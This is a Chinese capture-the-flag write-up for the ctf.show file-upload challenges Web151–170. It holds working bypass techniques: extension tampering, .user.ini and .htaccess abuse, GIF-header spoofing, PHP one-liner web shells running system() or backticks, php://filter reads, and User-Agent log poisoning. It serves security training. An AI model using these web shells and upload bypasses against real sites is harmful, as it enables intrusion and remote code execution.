Web151
F12修改源代码 exts后面png改为php 这样就可以上传php的文件了
data:image/s3,"s3://crabby-images/e9d14/e9d1449a26da855c0853e89a40592b1d98a67858" alt=""
Web152:
考点:后端不能单一校验
就是要传图片格式,抓个包传个png的图片 然后bp抓包修改php后缀解析 然后放包
Web153-web156
在php代码中可以使用"{}"代替"[]"
data:image/s3,"s3://crabby-images/3357f/3357f2173d1c2c6d233267c1f5d1e014a6e235d2" alt=""
.user.ini文件特性
当网站进行扫描时,会将.user.ini文件指向路径的内容包含在首页文件处(如index.php、index.html等),使用参数auto_prepend_file(包含至首页文件头部)和auto_append_file(包含在首页文件尾部)进行配置
例如:auto_prepend_file=1.png //将1.png文件内容包含在首页文件中,"="后紧跟需要包含文件路径
所以,本题的解题思路:
先将.user.ini文件上传至upload目录处,并且在其中写入auto_prepend_file=1.png,紧接着上传1.png格式一句话代码,最后访问payload即可
auto_prepend_file=1.png
data:image/s3,"s3://crabby-images/8421f/8421ff13779e94ad9e54568b8aa5b7c6dcab2ab8" alt=""
上传图片马
data:image/s3,"s3://crabby-images/7afa9/7afa9202493ff75669aa2b1c056eb5188bc32955" alt=""
访问index.php
ws=system("tac ../flag.php");
data:image/s3,"s3://crabby-images/49c8a/49c8a3ab8f098516a352240bdc086afe445d895a" alt=""
Web157-158
其余操作同上
图片上传内容
<?=system(' tac ../fl*')?>
Web159
其余操作同上
反引号绕过
<?=`tac ../fl*`?>
Web160
auto_prepend_file=1.png
data:image/s3,"s3://crabby-images/d9c5d/d9c5d5d614d336a1da6e1e55a36d07525bd8cd8a" alt=""
上传图片马
<?=include"ph"."p://filter/convert.base64-encode/resource=../flag.p"."hp"?>
data:image/s3,"s3://crabby-images/7d445/7d4452ca7ecaec046e397bce2ecfaecbbf82ab99" alt=""
再解码
data:image/s3,"s3://crabby-images/f4966/f4966885bb049d468d43f758b55d6e4f63e53022" alt=""
Web161
文件头校验添加
.gif,"GIF 89A"
GIF89a
auto_prepend_file=1.png
data:image/s3,"s3://crabby-images/07192/071928b2156700af73ff7dc698899b5eac81db15" alt=""
上传图片马
GIF89a
<?=include"ph"."p://filter/convert.base64-encode/resource=../flag.p"."hp"?>
data:image/s3,"s3://crabby-images/5fd06/5fd06ad9ccc527228865acd133122f5e1b98ac1d" alt=""
再解码
data:image/s3,"s3://crabby-images/25563/255631d17ca465adc2bf2a4a341048f8bb6645cf" alt=""
Web162-165
未完成
Web166
Bp抓包查看返回数据包msg
data:image/s3,"s3://crabby-images/5c222/5c22252d3b0de4dbcaf08705d7d04877bb152df3" alt=""
访问GET /upload/2.zip
抓包发现
if(res.code==0){
$("#result").html("文件上传成功 <a href='upload/download.php?file="+res.msg+"' target='_blank'>下载文件</a>");
data:image/s3,"s3://crabby-images/afa27/afa27fc628fbcc7ae526d4974c3e12f1f6887235" alt=""
浏览器访问地址下载zi'p
data:image/s3,"s3://crabby-images/f8012/f801201da13d358d04923747e10d3de3f9473cc5" alt=""
Web167
上传.htaccess文件
<FilesMatch ".jpg">
SetHandler application/x-httpd-php
</FilesMatch>
data:image/s3,"s3://crabby-images/52ae6/52ae6ed00d4f1efa990bc7eacd2848907621ccc6" alt=""
上传一句话木马
data:image/s3,"s3://crabby-images/34aa7/34aa7f64adee0fdabbaf09c1e55a4f45776121aa" alt=""
x=system('tac ../flag.php');
data:image/s3,"s3://crabby-images/7f31c/7f31c0c824baf666b2f4860fd61ce33785a2b2f4" alt=""
Web168
上传1.php 内容为:
<?php echo `cat /var/www/html/*`;?>
data:image/s3,"s3://crabby-images/fc6c6/fc6c678a6751047b26844f7448420584a01766cb" alt=""
https://4d308ebe-1e2a-4163-a95a-14c57cb8cf7e.challenge.ctf.show/upload/1.php
data:image/s3,"s3://crabby-images/f24ee/f24ee3d15a3634ca2c2a81b8ee4b8d2d19c83cf6" alt=""
Web169
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png
auto_prepend_file=/var/log/nginx/access.log
上传.user.ini修改
data:image/s3,"s3://crabby-images/b361d/b361d0d6a8e4db12fca075c4df590eac1b36c0a0" alt=""
上传一个php文件随便都行
抓包ua头rce
<?=system('cat ../flagaa.php')?>
data:image/s3,"s3://crabby-images/025d6/025d6b6bb90648ded0311c5c1a1a79178f6408a4" alt=""
Web170
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png
auto_prepend_file=/var/log/nginx/access.log
上传.user.ini修改
data:image/s3,"s3://crabby-images/b361d/b361d0d6a8e4db12fca075c4df590eac1b36c0a0" alt=""
上传一个php文件随便都行
抓包ua头rce
<?=system('cat ../flagaa.php')?>
data:image/s3,"s3://crabby-images/025d6/025d6b6bb90648ded0311c5c1a1a79178f6408a4" alt=""